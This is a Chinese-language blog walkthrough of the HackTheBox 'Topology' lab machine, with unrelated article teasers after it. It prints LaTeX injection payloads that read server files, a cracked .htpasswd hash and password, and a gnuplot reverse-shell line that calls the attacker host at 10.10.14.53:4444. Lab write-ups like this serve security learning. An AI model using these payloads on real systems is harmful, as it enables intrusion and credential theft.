HackTheBox-Machines--Topology

文章目录

  • 1 端口扫描
  • 2 漏洞探测
  • 三 权限提升


Topology 测试过程

1 端口扫描


nmap -sC -sV 10.129.23.12

在这里插入图片描述

2 漏洞探测


    端口扫描发现22和80端口,访问80端口,发现LaTeX方程生成器,访问该按钮发现子域: latex.topology.htb

在这里插入图片描述

在这里插入图片描述

    将域名添加到hosts文件中

echo "10.129.23.12 topology.htb latex.topology.htb" | sudo tee -a /etc/hosts

    1.使用搜索引擎查找LaTeX相关漏洞
在这里插入图片描述

   查找到 LaTex 对用户输入进行解析生成PNG图像,存在注入漏洞。

    2.LaTeX注入漏洞测试 读取 /etc/passwd

# payload 单行输出
\input{/etc/passwd}
#使用 \ $ 对payload进行包装 
$\input{/etc/passwd}$

在这里插入图片描述

在这里插入图片描述

#payload 多行输出
$\lstinputlisting{/etc/passwd}$

在这里插入图片描述

   3.读取Apache默认配置文件,获取到dev、stats等子域

$\lstinputlisting{/etc/apache2/sites-available/000-default.conf}$

   发现默认配置中存在dev、stats等子域,将子域添加到 hosts文件

echo "10.129.23.12 dev.topology.htb stats.topology.htb" | sudo tee -a /etc/hosts

在这里插入图片描述

在这里插入图片描述

   4.读取.htaccess文件,在文件内容中发现/.htpasswd文件

$\lstinputlisting{/var/www/dev/.htaccess}$

在这里插入图片描述

   5.读取/var/www/dev/.htpasswd,发现用户名及hash密码

$\lstinputlisting{/var/www/dev/.htpasswd}$

在这里插入图片描述

   6.对hash密码进行破解,获取到密码 calculus20

echo 'vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0' > hash.txt
john --wordlist=rockyou.txt hash.txt

   7.网站开启22端口,使用 vdaisley:calculus20

ssh vdaisley@topology.htb

在这里插入图片描述

在这里插入图片描述

三 权限提升


   1.本地开启web服务

python3 -m http.server 8000

   2.使用wget上传pspy pspy工具在非root权限下可以监控linux进程

   pspy工具地址:https://github.com/DominicBreuker/pspy?tab=readme-ov-file

wget http://10.10.14.53:8000/pspy64
chmod +x ./pspy64
./pspy64

在这里插入图片描述
在这里插入图片描述

   3.在pspy监控下,发现/opt/gnuplot/getdata.sh脚本

/bin/sh /opt/gnuplot/getdata.sh
/bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;

   pspy工具执行结果显示,通过find命令在 /opt/gnuplot/ 目录下,执行*.plt脚本,如果在*.plt可以写入反弹shell脚本,即可通过执行*.plt文件获取权限。

在这里插入图片描述

   4.在*.plt文件中写入反弹shell脚本

   查看gnuplot相关命令文档,发现system()命令可进行命令执行。gnuplot命令文档地址:http://gnuplot.info/docs_5.5/loc18483.html

在这里插入图片描述

#启动监听器
ncat -lnvp 4444
# 新建 shell.plt脚本文件
vim /opt/gnuplot/shell.plt

在这里插入图片描述

# 反弹shell payload
shell = system("/bin/bash -c '/bin/sh -i >& /dev/tcp/10.10.14.53/4444 0>&1'")
print shell

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/787636.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

超图新建三维数据集继续学习

1 新建三维数据集 之前操作过新建三维数据集,还不熟悉,继续熟悉; 现在有一个文件型的数据源,名为swtest1;它前面小图标上有UDX三个字母,表明这是一个UDX类型的数据源;在此数据源上右击&#x…

李白打酒加强版(c++实现)

题目 话说大诗人李白,一生好饮。 幸好他从不开车。 一天,他提着酒壶,从家里出来,酒壶中有酒 2 斗。 他边走边唱: 无事街上走,提壶去打酒。 逢店加一倍,遇花喝一斗。 这一路上,…

【观察者模式】

观察者模式 什么是观察者模式? 观察者模式定义了对象之间的一种一对多依赖关系,允许多个观察者对象同时监听某一个主题对象。这种模式是事件驱动编程的核心,其主要目标是实现对象间的松耦合。松耦合的设计允许我们构建灵活的系统&#xff0…

SSH端口转发

SSH介绍 SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能 SSH转发常用的参数介绍: -C请求压缩所有数据-D动态转发、即socks代理-f后台执行SSH指令-g允许远程…

hxp CTF 2021 - A New Novel LFI(新颖的解法)

一、环境 unbentu,docker https://2021.ctf.link/assets/files/includers%20revenge-25377e1ebb23d014.tar.xz 二、解析 PHP Filter 当中有一种 convert.iconv 的 Filter ,可以用来将数据从字符集 A 转换为字符集 B ,其中这两个字符集可以…

极狐GitLab 13.11 重磅发布多项与 DevSecOps 相关的功能【五】

GitLab 是一个全球知名的一体化 DevOps 平台,很多人都通过私有化部署 GitLab 来进行源代码托管。极狐GitLab :https://gitlab.cn/install?channelcontent&utm_sourcecsdn 是 GitLab 在中国的发行版,专门为中国程序员服务。可以一键式部署…

我的一年创作纪念日

机缘 实际上在之前的文章之中我已经介绍过自己与csdn的缘分了,当初对算法十分的痴迷,也很希望能够将自己的一些理解写在csdn上,所以就开始了在csdn上的写作。 收获 在创作过程中最大的收获还是对过去所学的知识的总结吧,可惜的就…

蓝桥杯算法题-图形排版

题目描述 小明需要在一篇文档中加入 N 张图片,其中第 i 张图片的宽度是 Wi,高度是 Hi。   假设纸张的宽度是 M,小明使用的文档编辑工具会用以下方式对图片进行自动排版: 1. 该工具会按照图片顺序,在宽度 M 以内&…

企业客户信息反馈平台的设计与实现|Springboot+ Mysql+Java+ B/S结构(可运行源码+数据库+设计文档)

本项目包含可运行源码数据库LW,文末可获取本项目的所有资料。 推荐阅读300套最新项目持续更新中..... 最新ssmjava项目文档视频演示可运行源码分享 最新jspjava项目文档视频演示可运行源码分享 最新Spring Boot项目文档视频演示可运行源码分享 2024年56套包含ja…

《数据结构学习笔记---第九篇》---循环队列的实现

文章目录 1.循环队列的定义 2.循环队列的判空判满 3.创建队列并初始化 4.入队和出队 5. 返回队尾队首元素 6.释放循环队列 1.循环队列的定义 定义:存储队列元素的表从逻辑上被视为一个环。 我们此次实现的循环队列,采用顺序表 typedef struct {int…

Xception模型详解

简介 Xception的名称源自于"Extreme Inception",它是在Inception架构的基础上进行了扩展和改进。Inception架构是Google团队提出的一种经典的卷积神经网络架构,用于解决深度卷积神经网络中的计算和参数增长问题。 与Inception不同&#xff0…

图像生成:SD lora加载代码详解与实现

文章目录 前言一、SD模型介绍二、模型加载1. 模型架构加载2. safetensors权重加载3. lora权重加载 三、Name匹配四、权重融合1、构建net类2、匹配lora weight和model weight3、基于lora权重创建lora模块4、权重融合 五、整体pipeline总结 前言 SD中lora的加载相信都不陌生&…

VSCode美化

今天有空收拾了一下VSCode,页面如下,个人觉得还是挺好看的~~ 1. 主题 Noctis 色彩较多,有种繁杂美。 我使用的是浅色主题的一款Noctis Hibernus 2. 字体 Maple Mono 官网:Maple-Font 我只安装了下图两个字体,使…

堆积排序python实现

堆积排序(Heap Sort)是一种基于二叉堆的排序算法。Python语言实现堆积排序算法可以如下所示: def heapify(arr, n, i):largest = i # Initialize largest as rootl = 2 * i + 1 # left = 2*i + 1r = 2 * i + 2

Java常用API之Encoders类解读

写在开头:本文用于作者学习Java常用API 我将官方文档中Collections类中所有API全测了一遍并打印了结果,日拱一卒,常看常新 在Spark中,Encoders类提供了一些静态方法用于创建不同数据类型的编码器。 首先,我遇到这样…

区块链面试题总结

1、什么是区块链? 区块链是不间断的经济交易数字分类账,可以进行编程,以记录不止金融交易,还可以记录其他有价值的东西,简单来说,区块链是一个不可变记录的分布式数据库,该数据库由计算机集群来…

今后的推进计划方针

今后的推进计划方针 信息数学物理 信息 线段树,其它的随缘。 数学 三角函数(必修3)-> 对数函数和指数函数 物理 随缘

Docker部署Nexus Maven私服并且实现远程访问Nexus界面

目录 ⛳️推荐 1. Docker安装Nexus 2. 本地访问Nexus 3. Linux安装Cpolar 4. 配置Nexus界面公网地址 5. 远程访问 Nexus界面 6. 固定Nexus公网地址 7. 固定地址访问Nexus ⛳️推荐 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默&am…

使用混沌加密图像(MATLAB)

logistic图像加密是一种基于混沌理论的加密算法,它利用混沌系统的特性,如敏感依赖于初始条件和参数的非线性动态行为,来生成密钥和进行加密解密操作。以下是逻辑加密的基本原理和过程: 基本原理: 混沌系统特性利用:逻辑加密基于混沌系统的特性,利用混沌系统的非线性、不…

Vue3:使用Pinia的$subscribe+localStorage实现数据存储

一、情景说明 我们学习Vue的时候,知道可以用watch来监听数据的变化 那么,Pinia的store中的数据发生变化,如何监听了? 这里就用到$subscribe来实现效果 这一篇,$subscribelocalStorage实现数据存储的案例&#xff0c…